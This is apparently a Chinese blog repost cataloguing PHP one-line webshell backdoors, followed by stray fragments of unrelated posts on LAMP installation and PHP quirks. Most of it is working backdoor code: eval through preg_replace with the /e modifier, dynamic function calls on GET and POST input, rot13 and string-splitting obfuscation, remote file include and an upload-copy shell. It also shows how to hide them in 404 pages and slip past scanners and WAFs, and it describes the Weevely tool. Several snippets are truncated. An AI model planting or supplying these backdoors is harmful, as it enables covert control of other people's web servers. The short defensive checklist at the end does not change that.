php的Apa紅燈 那些強悍的PHP一句話後門

2021-10-16 19:16:53 字數 4350 閱讀 1938

我們以乙個學習的心態來對待這些php後門程式,很多php後門**讓我們看到程式設計師們是多麼的用心良苦。

強悍的php一句話後門

這類後門讓**、伺服器管理員很是頭疼,經常要換著方法進行各種檢測,而很多新出現的編寫技術,用普通的檢測方法是沒法發現並處理的。今天我們細數一些有意思的php一句話木馬。

利用404頁面隱藏php小馬:

404頁面是**常用的檔案,一般建議好後很少有人會去對它進行檢查修改,這時我們可以利用這一點進行隱藏後門。

無特徵隱藏php一句話:<?php

session_start();

$_post['code'] && $_session['thecode'] = trim($_post['code']);

$_session['thecode']&&preg_replace('\'a\'eis','e'.'v'.'a'.'l'.'(base64_decode($_session[\'thecode\']))','a');

將$_post['code']的內容賦值給$_session['thecode'],然後執行$_session['thecode'],亮點是沒有特徵碼。用掃瞄工具來檢查**的話,是不會報警的,達到目的了。

超級隱蔽的php後門:<?php $_get[a]($_get[b]);?>

僅用get函式就構成了木馬;

利用方法:?a=assert&b=$;

執行後當前目錄生成c.php一句話木馬,當傳參a為eval時會報錯木馬生成失敗,為assert時同樣報錯,但會生成木馬,真可謂不可小視,簡簡單單的一句話,被延伸到這般應用。

層級請求,編碼執行php後門:

此方法用兩個檔案實現,檔案1<?php

//後門url

通過http請求中的http_referer來執行經過base64編碼的**,來達到後門的效果,一般waf對referer這些檢測要鬆一點,或者沒有檢測。用這個思路bypass waf不錯。

php後門生成工具weevely

weevely是一款針對php的webshell的自由軟體,可用於模擬乙個類似於telnet的連線shell,weevely通常用於web程式的漏洞利用,隱藏後門或者使用類似telnet的方式來代替web 頁面式的管理,weevely生成的伺服器端php**是經過了base64編碼的,所以可以騙過主流的防毒軟體和ids,上傳伺服器端**後通常可以通過weevely直接執行。

weevely所生成的php後門所使用的方法是現在比較主流的base64加密結合字串變形技術,後門中所使用的函式均是常用的字串處理函式,被作為檢查規則的eval,system等函式都不會直接出現在**中,從而可以致使後門檔案繞過後門查詢工具的檢查。使用暗組的web後門查殺工具進行掃瞄,結果顯示該檔案無任何威脅。

以上是大概介紹下邊是截圖,相關使用方法亦家就不在這介紹了,簡單的科普一下。

三個變形的一句話php木馬

第乙個<?php ($_=@$_get[2]).@$_($_post[1])?>

第二個<?php

在菜刀裡寫http://site/2.php?_=assert&__=eval($_post['pass']) 密碼是pass。如果你用菜刀的附加資料的話更隱蔽,或者用其它注射工具也可以,因為是post提交的。

第三個($b4dboy = $_post['b4dboy']) && @preg_replace('/ad/e','@'.str_rot13('riny').'($b4dboy)', 'add');

str_rot13(『riny』)即編碼後的eval,完全避開了關鍵字,又不失效果,讓人**!

最後列幾個高階的php一句話木馬後門:1、

$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$hh("/[discuz]/e",$_post['h'],"access");

//菜刀一句話

2、$filename=$_get['xbid'];

include ($filename);

//危險的include函式,直接編譯任何檔案為php格式執行

3、$reg="c"."o"."p"."y";

$reg($_files[myfile][tmp_name],$_files[myfile][name]);

//重新命名任何檔案

4、$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";

$gzid("/[discuz]/e",$_post['h'],"access");

//菜刀一句話

5、include ($uid);

//危險的include函式,直接編譯任何檔案為php格式執行,post www.***.com/index.php?uid=/home/www/bbs/image.gif

//gif插一句話

6、典型一句話

程式後門**

程式**

//容錯**

程式**

//使用lanker一句話客戶端的專家模式執行相關的php語句

程式**

$_post['sa']($_post['sb']);?>

程式**

$_post['sa']($_post['sb'],$_post['sc'])?>

程式**

@preg_replace("/[email]/e",$_post['h'],"error");

//使用這個後,使用菜刀一句話客戶端在配置連線的時候在"配置"一欄輸入

程式**

h=@eval_r($_post1);

程式**

//繞過<?限制的一句話

綜上,這些php一句話後門可謂五臟俱全,一不小心您肯定中招了,而我們今天這篇文章的重中之重在哪呢?重點就在下邊的總結!

如何應對php一句話後門:

2,伺服器日誌檔案要經常看,經常備份

3,對每個站點進行嚴格的許可權分配

4,對動態檔案及目錄經常批量安全審查

5,學會如何進行手工防毒《即行為判斷查殺》

6,時刻關注,或滲入活躍的網路安全營地

7,對伺服器環境層級化處理,哪怕乙個函式也可做規則

我們認為當管理的站點多了,資料量大時,我們應合理應用一些輔助工具,但不應完全依賴這些工具,技術是時刻在更新進步的,最為重要的是你應學會和理解,編寫這些強悍後門的人所處思維,角色上的換位可為你帶來更大的進步。

via[亦家網路]

php的Apa紅燈 Deepin 下安裝 LAMP

ubuntu deepin linux 下使用 apt get 安裝所需套的軟體 lamp 1.安裝 apacache2 apt get install apache2 配置檔案 etc apache2 apache2.conf service apache2 start service apach...

關於PHP的那些坑

因為php是弱型別語言,常常會發生許多意想不到的問題,所以,我們再次一一細數這些我們踏過的坑 1 foreach中自動回將key為數值的轉化成整型,造成無法匹配 function translate keyword return 其他 echo translate google php eol ec...

PHP那些瑣碎的知識點

php有很多很奇特 很難記的知識點,我做了一下記錄 php不會檢查單引號 字串中變數內插或 幾乎 任何轉義序列,所以採用單引號這種方式來定義字串相當簡單快捷。但是,雙引號 則不然,php會檢查字串中的變數或者轉義序列,並輸出變數和轉義序列的值。a 123 print a t print a 輸出 a...